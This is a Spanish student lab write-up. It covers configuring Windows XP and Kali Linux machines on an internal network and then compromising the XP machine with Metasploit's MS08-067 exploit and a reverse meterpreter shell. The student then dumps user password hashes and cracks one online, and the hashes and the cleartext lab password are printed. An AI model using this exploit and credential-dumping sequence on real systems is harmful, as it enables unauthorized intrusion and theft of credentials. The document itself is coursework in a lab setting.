Embed Size (px)
Citation preview
1) Reproducir lo visto en clase, documentándolo , incluye
• Kali: atacar una máquina W/XP en la que se habrá dado de alta un usuario ALUMNO ( tu nombre) y se le pondrá una password.
- Primero tenemos que configurar las dos máquinas windows xp y Kali Linux, ponerlos en red interna y Nombre RED 10.
- Primer paso tenemos que hacer un escaneo de la red desde Kali Linux o Windows xp con un programa por ejemplo Zenmap, obtener la ip y el S.O.
- Si vamos a How Details, nos da más detalles, que ip tiene, la mac del equipo y sistema operativo y como es windows xp es vulnerable, con el metasploit de Kali Linux podemos atacar esa vulnerabilidad y entrar en el equipo sin que se entere el usuario.
Windows XP- Vamos a cuenta de usuario y creamos una nueva cuenta .
- Ponemos nuestro nombre al nombre de la cuenta.
- Aquí elijo Administrar la cuenta para que tenga permiso de todo, lo normal es mejor poner Limitada si solo va ser un invitado para que no tenga permiso de borrar la cuenta de los de mas y sus carpetas personales.
- Ya tenemos creada nuestra cuenta.
- Ahora nos falta crear una contraseña para nuestra cuenta.
- Ponemos una contraseña por ejemplo renaido, Ahora ya ponemos entrar en nuestra iniciar sesión.
- Hacemos ipconfig para saber que ip y máscara que tenemos en nuestro equipo, si observamos tenemos la ip 10.0.0.2/16.
- Kali Linux- Tenemos que configurar la red, hay tres maneras de configurar lo, uno desde el propio sistema Kali Linux, Le da Wired Settings..
- Vamos a Network, después le damos en la derecha en conneting – 1000 MBS y editamos
- Tenemos que poner el mismo rango de ip que windows xp ponemos la ip 10.0.0.3/16
- También podemos hacerlo desde comandos utilizando el comando ifconfig eth0 10.0.0.3 netmask255.0.0.0 broadcast 10.255.255.255
- La otra manera sería editar el archivo interfaces que esta en etc/netkork, lo editamos con el comando sudo nano /et/network/interfacesauto eth0iface eth0 inet staticaddress 10.0.03metmask 255.0.0.0broadcast 10.255.255.255
- Una vez configurada la tarjeta de red, abrimos un terminal y hacemos ifconfig para ver si nos cogió la ip. Nos cogió perfectamente.
- Hacemos un ping al 10.0.0.2 para ver si se comunica con windows xp.
- Desde windows xp también hacemos un ping al 10.0.0.3 para ver si comunica con la máquina KaliLinux
- Ahora que tenemos configurado la red y que se comunican las máquinas vamos a lanzar el metasploit lo podemos lanzar desde las propias herramientas de Kali Linux o desde el teminal.
- Desde el terminal para lanzar metasploit, hay que utilizar el comando msfconsole.
- metasploit ya lo tenemos lanzado
- Si no supiéramos que hacer podemos poner help y nos saldría montón de posibilidades que podríamos utilizar con metasploit.
- Tenemos que utilizar el comando use exploit/windows/smb/ms08_067_netapi(para aprovechar de una vulnerabilidad de la máquina windows xp)
- set RHOST 10.0.0.2(La ip que queremos atacar)
- set PAYLOAD windows/meterpreter/reverse_tcp(Cargamos el payload meterpreter para controlar la shell . Con esto lo que hacemos es ejecutar una consola de comandos interna de la víctima para poder controlarla.
Set LHOST 10.0.0.3(es para cuando lancemos el a este ip)
- Ahora lanzamos el exploit, si fue todo bien, estaríamos dentro de windows xp
- Ponemos shell, para entrar al sistema windows
- Ahora hacemos una prueba para ver que todo funcionó utilizamos el comando echo Hola Mundo >andres.txt(con esto nos creará un archivo de texto en el escritorio de windows xp)
- Vamos a la máquina windows xp y efectivamente nos creo el archivo de texto
- Lo abrimos y es lo que escribimos desde el Kali Linux.
Run winemun (es para hacer volcado de información, por ejemplo políticas que tenga aplicadas, volcado de los hashes, rama de registros interesantes y lo que tiene instlado.)
- Salimos del meterpreter con exit nos dirigimos a la carpeta .msf4/logs/scripts/winemun y entramosen el directorio CASAXP1_20190505.2632.
- Buscamos el archivo que contiene los hahses que es el archivo hashdump.txt
- Vemos que nos hizo un volcado de los hashes y nos hizo del Administrador, andres, carlos y el queme interesa el andres que es mi usuario 5038426c2ec6ee92aad3b435b51404ee(LM) 5038426c2ec6ee92aad3b435b51404ee(NTML)
El ataque debe descubrir todos los usuarios y los hashes. Con otro servicio se obtendrá la password en texto claro.- Buscamos por ejemplo hahshkiller para sacar texto claro la password del hash y lo saco perfectamente la contraseña de mi usuario es renaido.https://hashkiller.co.uk/
LM NTMLandres:1004:5038426c2ec6ee92aad3b435b51404ee:b5f593322f7be1720173a333a053b895:::
